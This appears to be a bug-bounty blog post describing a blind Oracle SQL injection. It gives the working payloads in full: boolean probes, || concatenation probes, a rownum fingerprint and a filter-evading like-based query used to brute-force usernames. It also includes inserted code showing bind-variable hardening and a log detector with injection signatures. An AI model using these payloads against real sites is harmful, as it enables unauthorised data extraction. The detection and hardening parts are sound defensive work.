Thursday, April 16, 2020

Tricky Oracle SQL Injection Situation

Recently I learnt a few new things while solving SQL injections found during pentests and bug bounties. One technique that was new to me is one I learnt from my master, pokleyzz. This injection was found in a recent bug bounty program; the actual path and parameter names have been replaced.

The injection was found in the "idNumber" parameter of the following endpoint:
/foo/?theName=YAP&idNumber=248001[here]
Common payloads were tried against this target, and initially I found that the following payloads worked to distinguish a TRUE condition from a FALSE one:

/foo/?theName=YAP&idNumber=248001'+AND+'1'='1 TRUE
/foo/?theName=YAP&idNumber=248001'+AND+'2'='1 FALSE

and I was also able to use the pipe (||) string concatenation operator:

/foo/?theName=YAP&idNumber=248'||'001 TRUE
/foo/?theName=YAP&idNumber=24'||'8'||'001 TRUE
/foo/?theName=YAP&idNumber=24'||'X'||'001 FALSE

With these conditions (boolean logic working, and || accepted as a concatenation operator inside a string literal), I was able to narrow the database used by this application down to Oracle, PostgreSQL, IBM DB2 or Informix.
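To make clear why a payload such as 248'||'001 keeps the page working while changing the query, here is a small added example (mine, not code from the post) that builds the product lookup both the vulnerable way and with bind variables, and then lists the string literals in the resulting SQL text. The query shape (a LIKE on idNumber with a trailing %) is an assumption chosen to match the post's observation that the page lists products whose idNumber starts with the supplied value; the table and column names are placeholders.

```python
"""
Vulnerable vs. hardened construction of the lookup behind /foo/?theName=...&idNumber=...
Added example; the query shape, table and column names are assumptions, not from the post.
"""


def build_query_unsafe(the_name, id_number):
    """Vulnerable: user input is spliced into the SQL text, so a quote in the
    input ends the literal and || is parsed as Oracle's concatenation operator."""
    return (f"SELECT name FROM products WHERE theName = '{the_name}' "
            f"AND idNumber LIKE '{id_number}%'")


def build_query_safe(the_name, id_number):
    """Hardened: the SQL text is constant and contains no literals at all;
    the values travel separately as named bind variables (Oracle :name syntax)."""
    sql = ("SELECT name FROM products WHERE theName = :the_name "
           "AND idNumber LIKE :id_prefix")
    return sql, {"the_name": the_name, "id_prefix": id_number + "%"}


def sql_literals(sql):
    """Return the single-quoted string literals found in SQL text.
    Simple scanner for illustration: a '' pair is reported as one empty literal,
    which is how the post's 'and''||username||''like' payload is actually parsed."""
    literals, in_literal, buf = [], False, ""
    for ch in sql:
        if ch == "'":
            if in_literal:
                literals.append(buf)
                buf = ""
            in_literal = not in_literal
        elif in_literal:
            buf += ch
    return literals


def literal_count_changed(the_name, benign_id, probe_id):
    """True when the probe changes the number of literals in the unsafe query,
    i.e. the input has escaped its literal and altered the statement's structure."""
    benign = sql_literals(build_query_unsafe(the_name, benign_id))
    probe = sql_literals(build_query_unsafe(the_name, probe_id))
    return len(benign) != len(probe)


if __name__ == "__main__":
    for probe in ["248001", "248'||'001", "24'||'8'||'001"]:
        print(build_query_unsafe("YAP", probe), "->", sql_literals(build_query_unsafe("YAP", probe)))
    sql, binds = build_query_safe("YAP", "248'||'001")
    print(sql, binds, "->", sql_literals(sql))
```

With the unsafe builder the probe 248'||'001 turns one idNumber literal into two ('248' and '001%') joined by ||, which Oracle evaluates back to the benign prefix 248001%, so the page behaves identically and the attacker learns the operator is accepted. With the bind-variable version the SQL text never changes; python-oracledb's cursor.execute(sql, binds) accepts exactly this kind of dict of named binds, and the quote and || remain plain characters inside the data.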

At first, I thought this could be done using the same technique that I already knew:

See : https://blog.yappare.com/2012/04/advance-oracle-blind-sql-injection.html

However, CASE() was not working. After a few attempts, I stopped trying to use CASE(). Next, I tried this technique:

See: https://blog.yappare.com/2017/03/blind-sql-injection-in-erim-not-sure.html

No joy. Dead end. After almost two days of trying, I gave up doing it myself and asked a few friends for help.
No luck. I tried my last option, pokleyzz. In less than an hour, he showed me a technique that could be used:

/foo/?theName=YAP&idNumber=248'||<bruteforce any known SQL functions here>||'001

As a result, I found that "rownum" was accepted, which indicates the DBMS is Oracle (rownum is an Oracle-specific pseudocolumn). To reconfirm, the following was queried:

/foo/?theName=YAP&idNumber=24800'||rownum||'

The above payload resulted in the website displaying the list of "theName" products whose "idNumber" starts with 24800.

Interesting! Now, how can we at least extract data from this injection? Another blocker was identified: it seems the application filtered or replaced the following characters:
_ ( ) + . whitespaces
While this seemed like another dead end, pokleyzz showed another brilliant way to extract the data using the following payload:

 /foo/?theName=YAP&idNumber=248'||<bruteforce all column_name here>||'001
We found a few column names, one of which was "username". Then the final step was:

 /foo/?theName=YAP&idNumber=248001'and''||username||''like'<bruteforce-character>%
Note that this payload contains no whitespace, underscores, parentheses, plus signs or dots, so nothing in it is touched by the filter. I ran Intruder on the above attack point and voila, got the username 😼
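From the defender's side, every probe in this post (the boolean pairs, the || fingerprinting, the rownum check and the final like-based extraction) leaves a recognisable shape in the access log even after the filter forced the attacker to drop whitespace, parentheses and underscores. The following added example (mine, not from the post) URL-decodes each query parameter of a request line and matches the decoded value against signatures for those shapes. The log lines are constructed to mirror the post's payloads, with the quote and % wildcard percent-encoded as a browser or proxy would send them, plus two benign requests, one of which legitimately contains a quote.

```python
"""
Flag the concatenation-style Oracle injection probes described in the post
in web access logs. Added example with constructed sample data.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Each signature is applied to the URL-decoded value of every query parameter.
# \s* rather than \s+ because the post's final payload ('and''||...) has no spaces.
SIGNATURES = [
    ("quote-then-concat",   re.compile(r"'\s*\|\|")),
    ("concat-then-quote",   re.compile(r"\|\|\s*'")),
    ("quote-boolean-quote", re.compile(r"'\s*(?:and|or)\s*'", re.IGNORECASE)),
    ("oracle-rownum",       re.compile(r"\brownum\b", re.IGNORECASE)),
    ("like-after-quote",    re.compile(r"\blike\s*'", re.IGNORECASE)),
]

# Combined-log-format request field: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def decode_params(request_path):
    """Return {param: decoded value} for a request path; parse_qsl handles %27 and '+'."""
    query = urlsplit(request_path).query
    return dict(parse_qsl(query, keep_blank_values=True))


def scan_request(request_path):
    """Return the sorted list of signature names that fire on any parameter value."""
    hits = set()
    for value in decode_params(request_path).values():
        for name, pattern in SIGNATURES:
            if pattern.search(value):
                hits.add(name)
    return sorted(hits)


def scan_log(lines):
    """Return [(request_path, hits)] for every log line whose request trips a signature."""
    results = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = scan_request(match.group(1))
        if hits:
            results.append((match.group(1), hits))
    return results


# Constructed sample log: the post's probes (quote as %27, wildcard as %25) plus two benign requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Apr/2020:10:00:01 +0800] "GET /foo/?theName=YAP&idNumber=248001 HTTP/1.1" 200 512',
    '10.0.0.5 - - [16/Apr/2020:10:00:02 +0800] "GET /foo/?theName=YAP&idNumber=248001%27+AND+%271%27=%271 HTTP/1.1" 200 512',
    '10.0.0.5 - - [16/Apr/2020:10:00:03 +0800] "GET /foo/?theName=YAP&idNumber=248%27||%27001 HTTP/1.1" 200 512',
    '10.0.0.5 - - [16/Apr/2020:10:00:04 +0800] "GET /foo/?theName=YAP&idNumber=24800%27||rownum||%27 HTTP/1.1" 200 8192',
    '10.0.0.5 - - [16/Apr/2020:10:00:05 +0800] "GET /foo/?theName=YAP&idNumber=248001%27and%27%27||username||%27%27like%27a%25 HTTP/1.1" 200 512',
    '10.0.0.9 - - [16/Apr/2020:10:00:06 +0800] "GET /foo/?theName=O%27Brien&idNumber=300100 HTTP/1.1" 200 512',
]


if __name__ == "__main__":
    for path, hits in scan_log(SAMPLE_LOG):
        print(path, "->", ", ".join(hits))
```

Matching on decoded parameter values rather than the raw line is what keeps a plain apostrophe in a name (O'Brien) from firing: a quote alone is not a signature, a quote immediately followed by || or by and/or and another quote is. A single client producing the rownum and like-after-quote signatures in sequence, as this log shows, is the fingerprint-then-extract progression from the post and is worth alerting on even when every response is a 200.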

As always, pokleyzz is the best master I have. 💻

Bye.